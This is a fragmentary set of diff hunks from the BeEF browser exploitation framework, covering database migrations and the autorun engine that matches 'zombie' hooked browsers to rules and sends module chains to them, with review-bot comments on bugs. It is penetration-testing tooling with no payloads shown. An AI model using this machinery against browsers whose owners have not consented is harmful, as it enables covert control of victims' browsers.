# See the file 'doc/COPYING' for copying permission
#


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -46,7 +46,7 @@ module BeEF
return false if has_non_printable_char?(str)
return true if str.eql? 'UNKNOWN'
return true if str.eql? 'ALL'
return false if !nums_only?(str) and !str.match(/\A(0|[1-9][0-9]{0,3})(\.(0|[1-9][0-9]{0,3})){0,3}\z/)
return false if !nums_only?(str) and !is_valid_float?(str)
return false if str.length > 20
true
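Review bot: The version check depends on `is_valid_float?(str)`, which is defined outside this hunk, so how strict it is cannot be judged from here. If it accepts only a single decimal point, multi-part versions that the paired regex line allows (up to four dot-separated components, anchored with `\A…\z`) would be rejected, and if it is unanchored it would accept more than intended. The value presumably comes from the hooked browser, so I would confirm the helper is anchored and move `return false if str.length > 20` ahead of the pattern checks so that overlong input is rejected before any matching. The method begins above the hunk, and the side of each paired line is inferred.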


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#


@@ -0,0 +1,7 @@
class CreateMassMailer < ActiveRecord::Migration[6.0]
def change
create_table :mass_mailers do |t|
# TODO: fields
end
end
end


@@ -4,8 +4,8 @@ class CreateHttp < ActiveRecord::Migration[6.0]
t.text :hooked_browser_id
# The http request to perform. In clear text.
t.text :request
# Boolean value as string to say whether cross-origin requests are allowed
t.boolean :allow_cross_origin, default: true
# Boolean value as string to say whether cross-domain requests are allowed
t.boolean :allow_cross_domain, default: true
# The http response body received. In clear text.
t.text :response_data
# The http response code. Useful to handle cases like 404, 500, 302, ...
@@ -26,7 +26,7 @@ class CreateHttp < ActiveRecord::Migration[6.0]
t.text :domain
# The port on which perform the request.
t.text :port
# Boolean value to say if the request was cross-origin
# Boolean value to say if the request was cross-domain
t.text :has_ran, default: 'waiting'
# The path of the request.
# Example: /secret.html
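Review bot: Changing the column name between `allow_cross_origin` and `allow_cross_domain` inside the existing `create_table` migration only affects databases built from scratch; an install that has already run this migration keeps its current column and is never altered. If the rename is intended, it belongs in a new migration such as `rename_column :<TABLE>, :<OLD_NAME>, :<NEW_NAME>`, and the same applies to `cross_domain` in the CreateXssraysScan section. Two comments also do not match their columns: "Boolean value as string" sits on a `t.boolean`, and "Boolean value to say if the request was cross-domain" sits directly above `t.text :has_ran, default: 'waiting'`. The `change` method starts and ends outside the hunks shown.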


@@ -0,0 +1,9 @@
class CreateIpecExploit < ActiveRecord::Migration[6.0]
def change
create_table :ipec_exploits do |t|
t.text :name
t.text :protocol
t.text :os
end
end
end


@@ -0,0 +1,9 @@
class CreateIpecExploitRun < ActiveRecord::Migration[6.0]
def change
create_table :ipec_exploit_runs do |t|
t.boolean :launched
t.text :http_headers
t.text :junk_size
end
end
end


@@ -5,7 +5,7 @@ class CreateXssraysScan < ActiveRecord::Migration[6.0]
t.datetime :scan_start
t.datetime :scan_finish
t.text :domain
t.text :cross_origin
t.text :cross_domain
t.integer :clean_timeout
t.boolean :is_started
t.boolean :is_finished


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -19,243 +19,31 @@ module BeEF
@debug_on = @config.get('beef.debug')
@VERSION = ['<', '<=', '==', '>=', '>', 'ALL']
@VERSION_STR = %w[XP Vista 7]
end
# Checks if there are any ARE rules to be triggered for the specified hooked browser.
#
# Returns an array with rule IDs that matched and should be triggered.
# if rule_id is specified, checks will be executed only against the specified rule (useful
# for dynamic triggering of new rulesets ar runtime)
def find_matching_rules_for_zombie(browser, browser_version, os, os_version)
rules = BeEF::Core::Models::Rule.all
return if rules.nil?
return if rules.empty?
# TODO: handle cases where there are multiple ARE rules for the same hooked browser.
# maybe rules need to have priority or something?
print_info '[ARE] Checking if any defined rules should be triggered on target.'
match_rules = []
rules.each do |rule|
next unless zombie_matches_rule?(browser, browser_version, os, os_version, rule)
match_rules.push(rule.id)
print_more("Hooked browser and OS match rule: #{rule.name}.")
end
print_more("Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser.")
match_rules
end
# @return [Boolean]
# Note: browser version checks are supporting only major versions, ex: C 43, IE 11
# Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1
def zombie_matches_rule?(browser, browser_version, os, os_version, rule)
return false if rule.nil?
unless zombie_browser_matches_rule?(browser, browser_version, rule)
print_debug("Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : does not match")
return false
end
print_debug("Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : matched")
unless zombie_os_matches_rule?(os, os_version, rule)
print_debug("OS version check -> (hook) #{os_version} #{rule.os_version} (rule): does not match")
return false
end
print_debug("OS version check -> (hook) #{os_version} #{rule.os_version} (rule): matched")
true
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
end
# @return [Boolean]
# TODO: This should be updated to support matching multiple OS (like the browser check below)
def zombie_os_matches_rule?(os, os_version, rule)
return false if rule.nil?
return false unless rule.os == 'ALL' || os == rule.os
# check if the OS versions match
os_ver_rule_cond = rule.os_version.split(' ').first
return true if os_ver_rule_cond == 'ALL'
return false unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
if os_ver_rule_maj == 'XP'
os_ver_rule_maj = 5
os_ver_rule_min = 0
elsif os_ver_rule_maj == 'Vista'
os_ver_rule_maj = 6
os_ver_rule_min = 0
elsif os_ver_rule_maj == '7'
os_ver_rule_maj = 6
os_ver_rule_min = 0
end
# Most of the times Linux/*BSD OS doesn't return any version
# (TODO: improve OS detection on these operating systems)
if !os_version.nil? && !@VERSION_STR.include?(os_version)
os_ver_hook_maj = os_version.split('.').first
os_ver_hook_min = os_version.split('.').last
# the following assignments to 0 are need for later checks like:
# 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
os_ver_hook_min = 0 if os_version.split('.').length == 1
os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
else
# XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
# TODO: BUG: This will fail horribly if the target OS is Windows 7 or newer,
# as no version normalization is performed.
# TODO: Update this for every OS since Vista/7 ...
if os_version == 'XP'
os_ver_hook_maj = 5
os_ver_hook_min = 0
elsif os_version == 'Vista'
os_ver_hook_maj = 6
os_ver_hook_min = 0
elsif os_version == '7'
os_ver_hook_maj = 6
os_ver_hook_min = 0
end
end
if !os_version.nil? || rule.os_version != 'ALL'
os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
return false unless (os_major_version_match && os_minor_version_match)
end
true
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
end
# @return [Boolean]
def zombie_browser_matches_rule?(browser, browser_version, rule)
return false if rule.nil?
b_ver_cond = rule.browser_version.split(' ').first
return false unless @VERSION.include?(b_ver_cond)
b_ver = rule.browser_version.split(' ').last
return false unless BeEF::Filters.is_valid_browserversion?(b_ver)
# check if rule specifies multiple browsers
if rule.browser =~ /\A[A-Z]+\Z/
return false unless rule.browser == 'ALL' || browser == rule.browser
# check if the browser version matches
browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
return false unless browser_version_match
else
browser_match = false
rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
if b == browser || b == 'ALL'
browser_match = true
break
end
end
return false unless browser_match
end
true
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
@VERSION_STR = %w[XP Vista]
end
# Check if the hooked browser type/version and OS type/version match any Rule-sets
# stored in the BeEF::Core::Models::Rule database table
# stored in the BeEF::Core::AutorunEngine::Models::Rule database table
# If one or more Rule-sets do match, trigger the module chain specified
def find_and_run_all_matching_rules_for_zombie(hb_id)
return if hb_id.nil?
hb_details = BeEF::Core::Models::BrowserDetails
browser_name = hb_details.get(hb_id, 'browser.name')
browser_version = hb_details.get(hb_id, 'browser.version')
os_name = hb_details.get(hb_id, 'host.os.name')
os_version = hb_details.get(hb_id, 'host.os.version')
def run(hb_id, browser_name, browser_version, os_name, os_version)
are = BeEF::Core::AutorunEngine::Engine.instance
rules = are.find_matching_rules_for_zombie(browser_name, browser_version, os_name, os_version)
return if rules.nil?
return if rules.empty?
are.run_rules_on_zombie(rules, hb_id)
match_rules = are.match(browser_name, browser_version, os_name, os_version)
are.trigger(match_rules, hb_id) if !match_rules.nil? && match_rules.length > 0
end
# Run the specified rule IDs on the specified zombie ID
# only if the rules match.
def run_matching_rules_on_zombie(rule_ids, hb_id)
return if rule_ids.nil?
return if hb_id.nil?
rule_ids = [rule_ids.to_i] if rule_ids.is_a?(String)
hb_details = BeEF::Core::Models::BrowserDetails
browser_name = hb_details.get(hb_id, 'browser.name')
browser_version = hb_details.get(hb_id, 'browser.version')
os_name = hb_details.get(hb_id, 'host.os.name')
os_version = hb_details.get(hb_id, 'host.os.version')
are = BeEF::Core::AutorunEngine::Engine.instance
rules = are.find_matching_rules_for_zombie(browser_name, browser_version, os_name, os_version)
return if rules.nil?
return if rules.empty?
new_rules = []
rules.each do |rule|
new_rules << rule if rule_ids.include?(rule)
end
return if new_rules.empty?
are.run_rules_on_zombie(new_rules, hb_id)
end
# Run the specified rule IDs on the specified zombie ID
# regardless of whether the rules match.
# Prepare and return the JavaScript of the modules to be sent.
# It also updates the rules ARE execution table with timings
def run_rules_on_zombie(rule_ids, hb_id)
return if rule_ids.nil?
return if hb_id.nil?
def trigger(rule_ids, hb_id)
hb = BeEF::HBManager.get_by_id(hb_id)
hb_session = hb.session
rule_ids = [rule_ids] if rule_ids.is_a?(Integer)
rule_ids.each do |rule_id|
rule = BeEF::Core::Models::Rule.find(rule_id)
modules = JSON.parse(rule.modules)
execution_order = JSON.parse(rule.execution_order)
execution_delay = JSON.parse(rule.execution_delay)
chain_mode = rule.chain_mode
unless %w[sequential nested-forward].include?(chain_mode)
print_error("[ARE] Invalid chain mode '#{chain_mode}' for rule")
return
end
chain_mode = rule.chain_mode
mods_bodies = []
mods_codes = []
@@ -288,13 +76,11 @@ module BeEF
when 'sequential'
wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay, rule_token)
else
# we should never get here. chain mode is validated earlier.
print_error("[ARE] Invalid chain mode '#{chain_mode}'")
next
wrapper = nil
print_error 'Chain mode looks wrong!'
# TODO: catch error, which should never happen as values are checked way before ;-)
end
print_more "Triggering rules #{rule_ids} on HB #{hb_id}"
are_exec = BeEF::Core::Models::Execution.new(
session_id: hb_session,
mod_count: modules.length,
@@ -302,14 +88,14 @@ module BeEF
rule_token: rule_token,
mod_body: wrapper,
is_sent: false,
rule_id: rule_id
id: rule_id
)
are_exec.save!
# Once Engine.check() verified that the hooked browser match a Rule, trigger the Rule ;-)
print_more "Triggering ruleset #{rule_ids} on HB #{hb_id}"
end
end
private
# Wraps module bodies in their own function, using setTimeout to trigger them with an eventual delay.
# Launch order is also taken care of.
# - sequential chain with delays (setTimeout stuff)
@@ -553,18 +339,20 @@ module BeEF
print_error '[ARE] Could not find module end index' if wrapper_end_index.nil?
cleaned_cmd_body = cmd_body.slice(wrapper_start_index..-(wrapper_end_index + 1)).join("\n")
print_error '[ARE] No command to send' if cleaned_cmd_body.eql?('')
# check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number)
return cleaned_cmd_body unless replace_input
if cleaned_cmd_body.include?('"<<mod_input>>"')
cleaned_cmd_body.gsub('"<<mod_input>>"', 'mod_input')
elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
elsif cleaned_cmd_body.include?('<<mod_input>>')
cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
if replace_input
if cleaned_cmd_body.include?('"<<mod_input>>"')
final_cmd_body = cleaned_cmd_body.gsub('"<<mod_input>>"', 'mod_input')
elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
elsif cleaned_cmd_body.include?('<<mod_input>>')
final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
else
return cleaned_cmd_body
end
final_cmd_body
else
cleaned_cmd_body
end
@@ -572,6 +360,129 @@ module BeEF
print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body. #{e.message}"
end
# Checks if there are any ARE rules to be triggered for the specified hooked browser
#
# Note: browser version checks are supporting only major versions, ex: C 43, IE 11
# Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1
#
# Returns an array with rule IDs that matched and should be triggered.
# if rule_id is specified, checks will be executed only against the specified rule (useful
# for dynamic triggering of new rulesets ar runtime)
def match(browser, browser_version, os, os_version, rule_id = nil)
match_rules = []
rules = if rule_id.nil?
BeEF::Core::Models::Rule.all
else
[BeEF::Core::Models::Rule.find(rule_id)]
end
return nil if rules.nil?
return nil unless rules.length > 0
print_info '[ARE] Checking if any defined rules should be triggered on target.'
# TODO: handle cases where there are multiple ARE rules for the same hooked browser.
# TODO the above works well, but maybe rules need to have priority or something?
rules.each do |rule|
browser_match = false
os_match = false
b_ver_cond = rule.browser_version.split(' ').first
b_ver = rule.browser_version.split(' ').last
os_ver_rule_cond = rule.os_version.split(' ').first
os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
# Most of the times Linux/*BSD OS doesn't return any version
# (TODO: improve OS detection on these operating systems)
if !os_version.nil? && !@VERSION_STR.include?(os_version)
os_ver_hook_maj = os_version.split('.').first
os_ver_hook_min = os_version.split('.').last
# the following assignments to 0 are need for later checks like:
# 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
os_ver_hook_min = 0 if os_version.split('.').length == 1
os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
else
# most probably Windows XP or Vista. the following is a hack as Microsoft had the brilliant idea
# to switch from strings to numbers in OS versioning. To prevent rewriting code later on,
# we say that XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
if os_version == 'XP'
os_ver_hook_maj = 5
os_ver_hook_min = 0
end
if os_version == 'Vista'
os_ver_hook_maj = 6
os_ver_hook_min = 0
end
end
if os_ver_rule_maj == 'XP'
os_ver_rule_maj = 5
os_ver_rule_min = 0
end
if os_ver_rule_maj == 'Vista'
os_ver_rule_maj = 6
os_ver_rule_min = 0
end
next unless @VERSION.include?(b_ver_cond)
next unless BeEF::Filters.is_valid_browserversion?(b_ver)
next unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
# os_ver without checks as it can be very different or even empty, for instance on linux/bsd)
# skip rule unless the browser matches
browser_match = false
# check if rule specifies multiple browsers
if rule.browser =~ /\A[A-Z]+\Z/
next unless rule.browser == 'ALL' || browser == rule.browser
# check if the browser version matches
browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
browser_match = if browser_version_match
true
else
false
end
print_more "Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : #{browser_version_match}"
else
rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
browser_match = true if b == browser || b == 'ALL'
end
# else, only one browser
end
next unless browser_match
# skip rule unless the OS matches
next unless rule.os == 'ALL' || os == rule.os
# check if the OS versions match
if !os_version.nil? || rule.os_version != 'ALL'
os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
else
# os_version_match = true if (browser doesn't return an OS version || rule OS version is ALL )
os_major_version_match = true
os_minor_version_match = true
end
os_match = true if os_ver_rule_cond == 'ALL' || (os_major_version_match && os_minor_version_match)
print_more "OS version check -> (hook) #{os_version} #{rule.os_version} (rule): #{os_major_version_match && os_minor_version_match}"
if browser_match && os_match
print_more "Hooked browser and OS type/version MATCH rule: #{rule.name}."
match_rules.push(rule.id)
end
rescue StandardError => e
print_error e.message
print_debug e.backtrace.join("\n")
end
print_more "Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser type/version."
match_rules
end
# compare versions
def compare_versions(ver_a, cond, ver_b)
return true if cond == 'ALL'
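Review bot: In `trigger`, the `else` branch of the chain-mode `case` sets `wrapper = nil` and only prints an error, so the code below still builds and saves an `Execution` with `mod_body: nil`; a `next` after the `print_error` would skip the rule instead. The same `Execution.new` call passes `id: rule_id`, which looks like it sets the record's own primary key to the rule id, so a second execution of the same rule would presumably fail in `are_exec.save!`. If the table has a separate rule reference column, `rule_id: rule_id` is what is meant. `trigger` spans several hunks and part of its body is outside them, so this should be confirmed against the full file.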


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -18,63 +18,68 @@ module BeEF
VERSION = ['<', '<=', '==', '>=', '>', 'ALL', 'Vista', 'XP']
CHAIN_MODE = %w[sequential nested-forward]
MAX_VER_LEN = 15
# Parse a JSON ARE file and returns an Hash with the value mappings
def parse(name, author, browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode)
success = [true]
def parse(name, author, browser, browser_version, os, os_version, modules, execution_order, execution_delay, chain_mode)
raise ArgumentError, "Invalid rule name: #{name}" unless BeEF::Filters.is_non_empty_string?(name)
raise ArgumentError, "Invalid author name: #{author}" unless BeEF::Filters.is_non_empty_string?(author)
raise ArgumentError, "Invalid chain_mode definition: #{chain_mode}" unless CHAIN_MODE.include?(chain_mode)
raise ArgumentError, "Invalid os definition: #{os}" unless OS.include?(os)
unless modules.size == execution_delay.size
raise ArgumentError, "Number of execution_delay values (#{execution_delay.size}) must be consistent with number of modules (#{modules.size})"
end
execution_delay.each { |delay| raise TypeError, "Invalid execution_delay value: #{delay}. Values must be Integers." unless delay.is_a?(Integer) }
unless modules.size == execution_order.size
raise ArgumentError, "Number of execution_order values (#{execution_order.size}) must be consistent with number of modules (#{modules.size})"
end
execution_order.each { |order| raise TypeError, "Invalid execution_order value: #{order}. Values must be Integers." unless order.is_a?(Integer) }
return [false, 'Illegal chain_mode definition'] unless CHAIN_MODE.include?(chain_mode)
return [false, 'Illegal rule name'] unless BeEF::Filters.is_non_empty_string?(name)
return [false, 'Illegal author name'] unless BeEF::Filters.is_non_empty_string?(author)
# if multiple browsers were specified, check each browser
if browser.is_a?(Array)
browser.each do |b|
raise ArgumentError, "Invalid browser definition: #{browser}" unless BROWSER.include?(b)
return [false, 'Illegal browser definition'] unless BROWSER.include?(b)
end
# else, if only one browser was specified, check browser and browser version
else
raise ArgumentError, "Invalid browser definition: #{browser}" unless BROWSER.include?(browser)
return [false, 'Illegal browser definition'] unless BROWSER.include?(browser)
if browser_version != 'ALL' && !(VERSION.include?(browser_version[0, 2].gsub(/\s+/, '')) &&
BeEF::Filters.is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/, '')) && browser_version.length < MAX_VER_LEN)
raise ArgumentError, "Invalid browser_version definition: #{browser_version}"
return [false, 'Illegal browser_version definition']
end
end
if os_version != 'ALL' && !(VERSION.include?(os_version[0, 2].gsub(/\s+/, '')) &&
BeEF::Filters.is_valid_osversion?(os_version[2..-1].gsub(/\s+/, '')) && os_version.length < MAX_VER_LEN)
return ArgumentError, "Invalid os_version definition: #{os_version}"
return [false, 'Illegal os_version definition']
end
return [false, 'Illegal os definition'] unless OS.include?(os)
# check if module names, conditions and options are ok
modules.each do |cmd_mod|
mod = BeEF::Core::Models::CommandModule.where(name: cmd_mod['name']).first
if mod.nil?
return [false, "The specified module name (#{cmd_mod['name']}) does not exist"]
else
modk = BeEF::Module.get_key_by_database_id(mod.id)
mod_options = BeEF::Module.get_options(modk)
raise "The specified module name (#{cmd_mod['name']}) does not exist" if mod.nil?
modk = BeEF::Module.get_key_by_database_id(mod.id)
mod_options = BeEF::Module.get_options(modk)
opt_count = 0
mod_options.each do |opt|
if opt['name'] != cmd_mod['options'].keys[opt_count]
raise ArgumentError, "The specified option (#{cmd_mod['options'].keys[opt_count]}) for module (#{cmd_mod['name']}) was not specified"
opt_count = 0
mod_options.each do |opt|
if opt['name'] == cmd_mod['options'].keys[opt_count]
opt_count += 1
else
return [false, "The specified option (#{cmd_mod['options'].keys[opt_count]
}) for module (#{cmd_mod['name']}) does not exist"]
end
end
opt_count += 1
end
end
true
exec_order.each { |order| return [false, 'execution_order values must be Integers'] unless order.integer? }
exec_delay.each { |delay| return [false, 'execution_delay values must be Integers'] unless delay.integer? }
return [false, 'execution_order and execution_delay values must be consistent with modules numbers'] unless
modules.size == exec_order.size && modules.size == exec_delay.size
success
rescue StandardError => e
print_error e.message.to_s
print_debug e.backtrace.join("\n").to_s
[false, 'Something went wrong.']
end
end
end
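Review bot: The two type checks near the end of `parse` call `order.integer?` and `delay.integer?`, which exist only on numeric values, so a string or `nil` entry raises `NoMethodError` and the caller gets the generic `'Something went wrong.'` from the `rescue` instead of the intended message. `unless order.is_a?(Integer)` (and the same for `delay`) rejects those values with the specific error. A missing `execution_order` or `execution_delay` ends in the same `rescue`, because `nil.each` raises as well. A guard such as `return [false, 'execution_order and execution_delay must be arrays'] unless exec_order.is_a?(Array) && exec_delay.is_a?(Array)` before the loops would cover that case.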


@@ -1,6 +1,6 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -14,204 +14,76 @@ module BeEF
@debug_on = @config.get('beef.debug')
end
# Load an ARE rule set
# @param [Hash] ARE ruleset as JSON
# @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String}
def load_rule_json(data)
name = data['name'] || ''
author = data['author'] || ''
# this expects parsed JSON as input
def load(data)
name = data['name']
author = data['author']
browser = data['browser'] || 'ALL'
browser_version = data['browser_version'] || 'ALL'
os = data['os'] || 'ALL'
os_version = data['os_version'] || 'ALL'
modules = data['modules']
execution_order = data['execution_order']
execution_delay = data['execution_delay']
chain_mode = data['chain_mode'] || 'sequential'
exec_order = data['execution_order']
exec_delay = data['execution_delay']
